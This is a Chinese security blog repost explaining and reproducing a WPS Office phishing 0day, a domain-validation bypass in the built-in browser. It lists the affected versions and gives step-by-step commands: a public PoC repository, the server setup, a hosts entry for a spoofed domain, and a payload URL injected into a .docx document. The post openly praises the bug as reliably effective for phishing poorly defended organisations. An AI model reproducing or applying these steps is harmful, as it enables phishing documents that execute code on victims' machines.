(已复现)WPS钓鱼0day分享

admin 2023年11月7日00:16:51评论58 views字数 703阅读2分20秒阅读模式

这个day是今年国护的时候爆出来的,虽然国护已经过去很久但是这个day的杀伤力依旧很大,许多单位安全意识很薄,借助这个0day钓鱼可谓是屡试不爽。

漏洞影响

  WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.1208

漏洞原理

WPS 有内置浏览器,当打开该文档时, WPS  就会通过内置浏览器加载该链接。而有漏洞的版本对域名clientweb.docer.wps.cn.{xxxxx}wps.cn不进行检测,因而可以借助这个逻辑漏洞完成绕过。

复现准备:

本地复现

下载poc,需要python3.8以上的版本

https://github.com/ba0gu0/wps-rce

执行以下命令安装依赖文件

cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

在server文件夹下运行

python3 main.py

(已复现)WPS钓鱼0day分享

访问url

(已复现)WPS钓鱼0day分享

在受害主机上添加host

vpsip clientweb.docer.wps.cn.hackerwps.cn


因此弹出计算器的payload为

http://clientweb.docer.wps.cn.hackerwps.cn/calc


进入client文件夹运行

python main.py test.docx http://clientweb.docer.wps.cn.hackerwps.cn/calc

test是要注入payload的文档

(已复现)WPS钓鱼0day分享

生成带有命令的payload到目标主机上运行

(已复现)WPS钓鱼0day分享



原文始发于微信公众号(安全攻防屋):(已复现)WPS钓鱼0day分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月7日00:16:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (已复现)WPS钓鱼0day分享http://cn-sec.com/archives/2182090.html

发表评论

匿名网友 填写信息